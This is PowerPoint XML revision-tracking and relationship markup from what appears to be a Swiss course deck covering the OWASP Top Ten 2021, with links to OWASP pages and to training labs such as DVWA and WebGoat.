          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:53:20.934" v="341" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1878494669" sldId="289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3:29.359" v="353" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1878494669" sldId="289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3:32.741" v="354"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1878494669" sldId="289"/>
            <ac:spMk id="16" creationId="{E2ED4B01-94D3-44D4-B46D-301954C04557}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:53:37.549" v="357"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1878494669" sldId="289"/>
            <ac:spMk id="19" creationId="{DCD8AD08-4BC1-4CA6-AE6B-9B5951487F44}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:53:35.604" v="355"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1878494669" sldId="289"/>
            <ac:grpSpMk id="14" creationId="{4495FE29-1827-4C04-9E3E-848A8948863C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:55:12.401" v="412" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1878494669" sldId="289"/>
            <ac:grpSpMk id="17" creationId="{A55D92C3-4BA0-44C0-BB29-FB93EFA03764}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="del">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:53:36.822" v="356" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1878494669" sldId="289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3:32.741" v="354"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1878494669" sldId="289"/>
            <ac:picMk id="15" creationId="{D219E48D-282C-4B4A-8B2D-89F0BBBFB975}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:53:37.549" v="357"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1878494669" sldId="289"/>
            <ac:picMk id="18" creationId="{6F379362-3FA0-45F3-AB34-361254FD7D69}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:54:01.780" v="359" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="14536565" sldId="290"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:54:06.012" v="362" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1756265765" sldId="291"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:54:02.891" v="360" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="153406466" sldId="292"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:57:24.116" v="533" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3634056697" sldId="293"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modAnim">
        <pc:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:58:37.082" v="548"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="711546721" sldId="296"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:58:37.082" v="548"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="711546721" sldId="296"/>
            <ac:spMk id="24" creationId="{6324575F-B69C-4FC7-9887-C910854FF0A6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:55:49.734" v="442" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="711546721" sldId="296"/>
            <ac:spMk id="42" creationId="{E9A2D41F-90FA-4687-B2F2-B6B7A0B1E870}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:54:41.016" v="400" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="711546721" sldId="296"/>
            <ac:spMk id="48" creationId="{1947E0E6-BC99-489E-B4FD-14D5E668CE69}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:54:30.417" v="385" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="711546721" sldId="296"/>
            <ac:spMk id="52" creationId="{053DB572-73E3-4ECB-9A29-508025FE8405}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:54:47.177" v="410" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="711546721" sldId="296"/>
            <ac:spMk id="53" creationId="{271399BC-C017-4B0F-94EF-1F230E80D930}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:54:33.452" v="390" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="711546721" sldId="296"/>
            <ac:spMk id="57" creationId="{BB115EA4-4F58-436E-84AC-3E2977B57F97}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:58:37.082" v="548"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="711546721" sldId="296"/>
            <ac:grpSpMk id="22" creationId="{39365F51-F006-46E0-9B23-1C8A04014560}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="del">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:58:36.086" v="547" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="711546721" sldId="296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8:37.082" v="548"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="711546721" sldId="296"/>
            <ac:picMk id="23" creationId="{26CF64E0-F441-450F-86DF-452A9F2A0575}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod addAnim delAnim modAnim">
        <pc:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:59:01.942" v="550"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1614948850" sldId="297"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:56:27.545" v="466" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1614948850" sldId="297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6:07.270" v="450" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1614948850" sldId="297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6:46.654" v="490" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1614948850" sldId="297"/>
            <ac:spMk id="7" creationId="{E081B6EB-677D-457D-9E69-D8A0DC9A1E13}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:57:11.615" v="518" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1614948850" sldId="297"/>
            <ac:spMk id="14" creationId="{6CCEC4B4-A541-484D-9CD8-EB135D9447CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:57:01.083" v="501" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1614948850" sldId="297"/>
            <ac:spMk id="17" creationId="{90D6FE3B-FA6D-4E84-8D30-4FB8B489F484}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:57:19.061" v="532" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1614948850" sldId="297"/>
            <ac:spMk id="19" creationId="{8B644903-85A6-4D05-AA46-ECE7F98C4286}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:57:04.697" v="506" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1614948850" sldId="297"/>
            <ac:spMk id="23" creationId="{C200367A-8889-4CC1-A810-4690E5253883}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:59:01.942" v="550"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1614948850" sldId="297"/>
            <ac:spMk id="29" creationId="{DEFB9B3E-547F-4588-9324-6DB68315F60F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:59:01.942" v="550"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1614948850" sldId="297"/>
            <ac:grpSpMk id="26" creationId="{6D1AD115-BE01-4D3E-9AD7-BFF36774467F}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="del">
          <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:59:00.894" v="549" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1614948850" sldId="297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9:01.942" v="550"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1614948850" sldId="297"/>
            <ac:picMk id="28" creationId="{7EC8CED6-016E-44F4-9B3F-112712A804A5}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T11:54:04.044" v="361" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1910056109" sldId="298"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldMasterChg chg="modSldLayout">
        <pc:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T13:10:34.223" v="1484" actId="21"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="1775025852" sldId="2147483648"/>
        </pc:sldMasterMkLst>
        <pc:sldLayoutChg chg="addSp delSp modSp">
          <pc:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T12:52:44.541" v="1218"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1775025852" sldId="2147483648"/>
            <pc:sldLayoutMk cId="1811804172" sldId="2147483650"/>
          </pc:sldLayoutMkLst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3" creationId="{7B48A66B-C07B-4805-8586-47247A1C3E70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4" creationId="{E5C51EEE-E68E-45B2-8E3F-8A9FEDB4937F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7" creationId="{561DF138-E101-4DF7-B6B8-E7D9F070B796}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:grpChg chg="add del mod">
            <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T12:52:44.541" v="1218"/>
            <ac:grpSpMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="1775025852" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1811804172" sldId="2147483650"/>
              <ac:grpSpMk id="2" creationId="{DEE9ABD7-4917-4EF7-A380-F2BE9240F2E1}"/>
            </ac:grpSpMkLst>
          </pc:grpChg>
          <pc:grpChg chg="mod">
            <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T12:52:23.696" v="1217"/>
            <ac:grpSpMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="1775025852" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1811804172" sldId="2147483650"/>
              <ac:grpSpMk id="5" creationId="{CD9BFF0A-88ED-49F7-A6A0-C9BDD3039B79}"/>
            </ac:grpSpMkLst>
          </pc:grpChg>
          <pc:picChg chg="mod">
            <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T12:52:23.696" v="1217"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="1775025852" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1811804172" sldId="2147483650"/>
              <ac:picMk id="6" creationId="{81EE461F-B764-4EF0-B911-728A4454528A}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="addSp delSp modSp mod">
          <pc:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T13:10:34.223" v="1484" actId="21"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1775025852" sldId="2147483648"/>
            <pc:sldLayoutMk cId="1347235305" sldId="2147483658"/>
          </pc:sldLayoutMkLst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2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4" creationId="{00000000-0000-0000-0000-000000000000}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="add del mod">
            <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T13:01:53.609" v="1473" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="1775025852" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1347235305" sldId="2147483658"/>
              <ac:spMk id="8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3:03:44.572" v="1476"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="1775025852" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1347235305" sldId="2147483658"/>
              <ac:spMk id="10" creationId="{F94D62D8-4FD0-47C6-BF73-2093465D5FC0}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:grpChg chg="add del mod">
            <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T13:04:05.176" v="1477" actId="478"/>
            <ac:grpSpMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="1775025852" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1347235305" sldId="2147483658"/>
              <ac:grpSpMk id="7" creationId="{B812648E-FA57-43B9-8F5C-82BAB4A0D8D5}"/>
            </ac:grpSpMkLst>
          </pc:grpChg>
          <pc:picChg chg="del mod">
            <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T13:10:34.223" v="1484" actId="21"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="1775025852" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1347235305" sldId="2147483658"/>
              <ac:picMk id="6" creationId="{4DB575FA-74E5-4BA0-A205-C532874A34E5}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="mod">
            <ac:chgData name="Dorotea Böhm" userId="cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="ADAL" clId="{6581DDAA-A437-4016-B642-302C69B1F185}" dt="2020-06-26T13:03:44.572" v="1476"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="1775025852" sldId="2147483648"/>
              <pc:sldLayoutMk cId="1347235305" sldId="2147483658"/>
              <ac:picMk id="9" creationId="{59D708B5-317C-4B1D-995F-AE5BB075B7C9}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
      </pc:sldMasterChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Dorotea Böhm" userId="7801c4e6-7c1c-49ef-ac6c-f61a3d331c0d" providerId="ADAL" clId="{01961FE0-89DD-493B-80E6-FC08FDFC4CC3}"/>
    <pc:docChg chg="addSld modSld">
      <pc:chgData name="Dorotea Böhm" userId="7801c4e6-7c1c-49ef-ac6c-f61a3d331c0d" providerId="ADAL" clId="{01961FE0-89DD-493B-80E6-FC08FDFC4CC3}" dt="2020-06-28T09:12:48.359" v="224" actId="255"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp add mod modAnim">
        <pc:chgData name="Dorotea Böhm" userId="7801c4e6-7c1c-49ef-ac6c-f61a3d331c0d" providerId="ADAL" clId="{01961FE0-89DD-493B-80E6-FC08FDFC4CC3}" dt="2020-06-28T09:12:48.359" v="224" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3816743465" sldId="298"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="7801c4e6-7c1c-49ef-ac6c-f61a3d331c0d" providerId="ADAL" clId="{01961FE0-89DD-493B-80E6-FC08FDFC4CC3}" dt="2020-06-28T09:12:48.359" v="224" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3816743465" sldId="298"/>
            <ac:spMk id="2" creationId="{F2007E35-24E6-4B5E-A455-F79D2D9530FD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="7801c4e6-7c1c-49ef-ac6c-f61a3d331c0d" providerId="ADAL" clId="{01961FE0-89DD-493B-80E6-FC08FDFC4CC3}" dt="2020-06-28T09:10:49.823" v="15" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3816743465" sldId="298"/>
            <ac:spMk id="29" creationId="{55998A45-6201-4C83-A6E1-074BD878E99D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Dorotea Böhm" userId="S::dorotea.boehm@lernen.siw.swiss::cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="AD" clId="Web-{B43366CE-704C-48C6-9BF8-FB022623A375}"/>
    <pc:docChg chg="modSld sldOrd">
      <pc:chgData name="Dorotea Böhm" userId="S::dorotea.boehm@lernen.siw.swiss::cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="AD" clId="Web-{B43366CE-704C-48C6-9BF8-FB022623A375}" dt="2020-06-28T17:50:41.423" v="218" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp ord">
        <pc:chgData name="Dorotea Böhm" userId="S::dorotea.boehm@lernen.siw.swiss::cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="AD" clId="Web-{B43366CE-704C-48C6-9BF8-FB022623A375}" dt="2020-06-28T17:50:41.423" v="217" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2366924457" sldId="276"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dorotea Böhm" userId="S::dorotea.boehm@lernen.siw.swiss::cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="AD" clId="Web-{B43366CE-704C-48C6-9BF8-FB022623A375}" dt="2020-06-28T17:50:41.423" v="217" actId="20577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S::dorotea.boehm@lernen.siw.swiss::cabcf631-da53-4a6d-84a3-e6f7c32ed5b9" providerId="AD" clId="Web-{B43366CE-704C-48C6-9BF8-FB022623A375}" dt="2020-06-28T17:48:42.785" v="1" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2366924457" sldId="276"/>
            <ac:spMk id="29" creationId="{55998A45-6201-4C83-A6E1-074BD878E9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BB07-6B3B-455F-A3E1-B0EC6984990C}" type="datetimeFigureOut">
              <a:rPr lang="de-CH" smtClean="0"/>
              <a:t>04.03.2022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B75E-D8E2-43F8-8ADA-CFDCAD597B9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8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gehen OWASP Top Ten 2021 Thema für Thema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553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9793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744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601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589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gehen OWASP Top Ten 2021 Thema für Thema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981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6190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023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0423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914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904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1759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012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 bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="900000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76" y="304728"/>
            <a:ext cx="11547130" cy="589812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375" y="1050932"/>
            <a:ext cx="11547130" cy="51195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2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911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94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C4F4CE-3B5C-4611-AA64-FE58FACD6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4B1-9A24-4463-B637-6105CF1DF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416F6-1932-422B-99E1-BCA03695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4DF240-4E55-4A5A-9DF7-04E86B367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DE612-7CBE-4020-B94E-DD9DC7C5C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02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xkcd.com/327/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A03_2021-Injec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3_2021-Injec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s://owasp.org/Top10/A03_2021-Injectio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ybercops-ip:7070/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:7070/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/digininja/DVW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s://owasp.org/Top10/A03_2021-Injection/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet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3_2021-Injecti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3_2021-Injecti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.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/owasptop10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hyperlink" Target="https://owasp.org/www-project-top-te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wasp.org/Top10/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.meetup.com/de-DE/OWASPSwitzerland/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/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s://owasp.org/www-project-top-te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ybercops-ip:7080/WebGoat" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:7080/WebGoat/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WebGoat/WebGoa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1_2021-Broken_Access_Contro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2_2021-Cryptographic_Failur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owasp.org/Top10/A02_2021-Cryptographic_Failures/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssllab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3_2021-Injec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8CAAA-2971-4E84-B7D1-DCA4F78E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5132306"/>
            <a:ext cx="10584000" cy="589812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="3600" b="1"/>
              <a:t>Fachkürzel - Fach ausgeschrieben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3D0A9-6CAA-438A-AAC3-D590FF7D3AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="0"/>
            <a:ext cx="946800" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A5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3600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Fach ACCE</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3600" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 2" descr="Lernen, Bildung, Bücher, Buch, Bibliothek, Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
